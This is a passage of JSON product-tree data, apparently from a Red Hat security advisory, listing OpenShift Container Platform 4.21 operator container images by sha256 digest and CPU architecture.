"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
